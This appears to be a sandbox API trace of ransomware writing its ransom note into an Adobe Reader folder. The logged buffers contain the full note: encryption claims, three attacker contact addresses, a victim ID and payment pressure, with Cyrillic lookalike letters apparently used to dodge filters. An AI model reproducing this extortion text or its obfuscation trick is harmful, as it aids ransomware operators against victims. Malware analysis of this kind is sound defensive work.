th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n\x90iÁoA¯Ú8r\x13\x96\x02¶\x99\x84b\x9a\x15ܽ²ýe\x1c\x06\x86\x0bm\"_\x82¥Ç0Ó\x18â\x17ê\x1b¥!Î~Ð\x11\\\x13u¿Ò$½Iq¯/\x0f)Ý\x8cÄ7ÓPå8Ë]\x08¢hjß\x9bÕ\x81¯\x89±¢¾¹ÝÒl\x94\x90ª\x89®Y\x17P\x9aÜC꺬p¶<ã4xI}\x90\x12÷r4Ûñ\x95ôXÒ¸â,Ái\x9dP)\x08\x86ÍZí\x0f­ê%}¯\x96¹\x04^=<¥\r.Z\x97\x1bxy", lpUsedDefaultChar=0x0) returned 7247 [0066.277] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.278] CloseHandle (hObject=0x1cc) returned 1 [0066.278] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\bg85_info.rtf")) returned 0xffffffff [0066.279] GetLastError () returned 0x2 [0066.279] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il 